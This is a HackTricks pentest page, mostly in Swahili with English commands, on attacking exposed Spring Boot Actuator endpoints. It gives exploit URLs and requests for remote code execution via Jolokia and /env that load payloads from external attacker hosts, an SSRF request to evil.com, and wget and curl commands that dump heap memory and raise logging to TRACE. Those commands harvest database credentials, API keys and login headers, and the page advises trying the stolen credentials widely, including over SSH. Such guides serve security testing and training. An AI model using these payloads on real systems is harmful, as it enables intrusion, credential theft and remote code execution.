HackTricksSpring Actuators
Reading time: 7 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Spring Auth Bypass
.png)
From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png
Exploiting Spring Boot Actuators
Angalia chapisho la awali kutoka [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Mambo Muhimu:
- Spring Boot Actuators register endpoints such as
/health,/trace,/beans,/env, etc. Katika toleo 1 hadi 1.4, endpoints hizi zinaweza kupatikana bila uthibitisho. Kuanzia toleo 1.5 na baadaye,/healthna/infopekee ndizo zisizo hatarishi kwa chaguo-msingi, lakini watengenezaji mara nyingi hufuta usalama huu. - Endpoints fulani za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo hatarishi:
/dump,/trace,/logfile,/shutdown,/mappings,/env,/actuator/env,/restart, and/heapdump.- Katika Spring Boot 1.x, actuators zinajiandikisha chini ya root URL, wakati katika 2.x, ziko chini ya base path ya
/actuator/.
Exploitation Techniques:
- Remote Code Execution via '/jolokia':
- The
/jolokiaactuator endpoint exposes the Jolokia Library, ambayo inaruhusu upatikanaji wa MBeans kwa kupitia HTTP. - The
reloadByURLaction inaweza kutumika kwa kureload configuration za logging kutoka kwenye URL ya nje, jambo ambalo linaweza kusababisha blind XXE au Remote Code Execution kupitia XML zilizotengenezwa mahsusi. - Example exploit URL:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
- Config Modification via '/env':
- Ikiwa Spring Cloud Libraries zipo, endpoint ya
/envinaruhusu mabadiliko ya properties za mazingira. - Properties zinaweza kubadilishwa ili kutilia mtego udhaifu mbalimbali, kama vile udhaifu wa XStream deserialization katika Eureka serviceURL.
- Example exploit POST request:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Other Useful Settings:
- Properties kama
spring.datasource.tomcat.validationQuery,spring.datasource.tomcat.url, naspring.datasource.tomcat.max-activezinaweza kubadilishwa kwa ajili ya exploits mbalimbali, kama SQL injection au kubadilisha connection strings za database.
Taarifa za Ziada:
- Orodha kamili ya actuators chaguo-msingi inapatikana here.
- The
/envendpoint katika Spring Boot 2.x inatumia muundo wa JSON kwa mabadiliko ya property, lakini dhana kuu inabaki ile ile.
Mada Zinazohusiana:
- Env + H2 RCE:
- Maelezo juu ya kutumia mchanganyiko wa endpoint ya
/envna database ya H2 yanapatikana here.
- SSRF on Spring Boot Through Incorrect Pathname Interpretation:
- Jinsi framework ya Spring inavyoshughulikia matrix parameters (
;) katika pathnames za HTTP inaweza kutumika kwa Server-Side Request Forgery (SSRF). - Example exploit request:
http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
HeapDump secrets mining (credentials, tokens, internal URLs)
Ikiwa /actuator/heapdump imefunuliwa, kwa kawaida unaweza kupata snapshot kamili ya JVM heap ambayo mara nyingi ina siri zinazoishi (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, n.k.).
- Download and quick triage:
bash
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
# Decode any Basic credentials you find
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
- Deeper analysis with VisualVM and OQL:
- Fungua heapdump katika VisualVM, chunguza instances za
java.lang.Stringau endesha OQL kutafuta siri:
select s.toString()
from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
- Automated extraction with JDumpSpider:
bash
java -jar JDumpSpider-*.jar heapdump
Matokeo ya kawaida yenye thamani kubwa:
- Spring
DataSourceProperties/HikariDataSourceobjects zinazoonyeshaurl,username,password. OriginTrackedMapPropertySourceentries zinazoonyeshamanagement.endpoints.web.exposure.include, ports za huduma, na Basic-Auth iliyojazwa ndani ya URLs (mfano, EurekadefaultZone).- Vipande vya kawaida vya HTTP request/response vinavyojumuisha
Authorization: Basic ...vilivyokamatwa ndani ya memory.
Tips:
- Tumia wordlist inayolenga Spring kugundua actuator endpoints haraka (mfano, SecLists spring-boot.txt) na hakikisha kila mara kama
/actuator/logfile,/actuator/httpexchanges,/actuator/env, na/actuator/configpropspia zimefunuliwa. - Credentials kutoka heapdump mara nyingi hufanya kazi kwa huduma za jirani na wakati mwingine kwa watumiaji wa mfumo (SSH), hivyo vijaribu kwa upana.
Kutumia vibaya Actuator loggers/logging kushika credentials
Ikiwa management.endpoints.web.exposure.include inaruhusu na /actuator/loggers imefunuliwa, unaweza kwa nguvu kuongeza viwango vya logi kwa njia ya dynamic kuwa DEBUG/TRACE kwa packages zinazoshughulikia authentication na request processing. Ikichanganywa na logi zinazoweza kusomwa (kupitia /actuator/logfile au njia za logi zinazoeleweka), hii inaweza leak credentials zilizowasilishwa wakati wa login flows (mfano, Basic-Auth headers au form parameters).
- Enumerate and crank up sensitive loggers:
bash
# List available loggers
curl -s http://target/actuator/loggers | jq .
# Enable very verbose logs for security/web stacks (adjust as needed)
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
- Find where logs are written and harvest:
bash
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
# Otherwise, query env/config to locate file path
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
- Trigger login/authentication traffic and parse the log for creds. Katika setups za microservice zenye gateway inayokinga auth, kuwezesha TRACE kwa packages za gateway/security mara nyingi hufanya headers na bodies za form kuwa zinazoonekana. Baadhi ya mazingira hata huunda synthetic login traffic kwa vipindi, hivyo kusanya kwa urahisi mara logging inapokuwa verbose.
Notes:
- Rudisha viwango vya logi ukimaliza:
POST /actuator/loggers/<logger>ukiweka{ "configuredLevel": null }. - Ikiwa
/actuator/httpexchangesimefunuliwa, pia inaweza kuonyesha metadata ya maombi ya hivi karibuni ambayo inaweza kujumuisha headers zenye nyeti.
References
- Exploring Spring Boot Actuator Misconfigurations (Wiz)
- VisualVM
- JDumpSpider
- 0xdf – HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.